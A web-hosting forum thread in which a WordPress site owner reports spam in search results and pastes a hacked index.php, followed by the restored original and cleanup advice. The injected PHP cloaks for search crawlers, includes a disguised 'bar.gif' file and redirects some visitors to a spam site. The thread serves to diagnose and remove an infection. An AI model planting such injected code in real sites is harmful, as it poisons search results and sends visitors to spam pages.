Incorrect results showing on Google and Bing search results?

[Webuser2014]

Has anyone looked at their website search results lately? I have and it is advertising spam stuff. We have nothing to do with spam stuff. There is nothing in our files on the webserver that says spam stuff but somehow it is showing in the results. Any ideas?

 

[cPanelMichael]

Hello

I suggest reviewing the .htaccess files and the code used in your scripts to determine if there is any data associated with those search engine results. It's possible your website files were exploited or the account itself was exploited.

Thank you.

 

[Webuser2014]

Thank for the info.

The index.php was modified somehow.

It was modified to

<?php
ini_set("display_errors","0");
define('WP_USE_THEMES', true);

$flag=false;$tmp=$_SERVER['HTTP_USER_AGENT'];if(stripos($tmp,'Google')!==false){$flag=true;}else if(stripos($tmp,'Bing')!==false){$flag=true;}else if(stripos($tmp,'Yahoo')!==false){$flag=true;}else if(stripos($tmp,'msnbot')!==false){$flag=true;}else if($_GET["c"]!=""){$flag=true;}
if($flag == false){

$RUrl=rawurldecode($_SERVER ['HTTP_REFERER']);

if (stripos($RUrl, 'spam crap here') or stripos($_GET["p"],'spam') !== false){header ( "Location: http://www.spamsitenamehere.com/" );}else{require('./wp-blog-header.php');}
} else {
include_once('bar.gif');
}

I have restored it to the original so my wordpress site now works.

<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');

 

[quizknows]

Did you note the time stamps on the index file before you reverted it? You'll need this information to properly fix the infection, otherwise it will likely return.

Check for any other files modified around that time; make sure your wordpress is updated, and audit your theme(s) and plugins for similar code. Always change your wp-admin password and your cPanel password as well.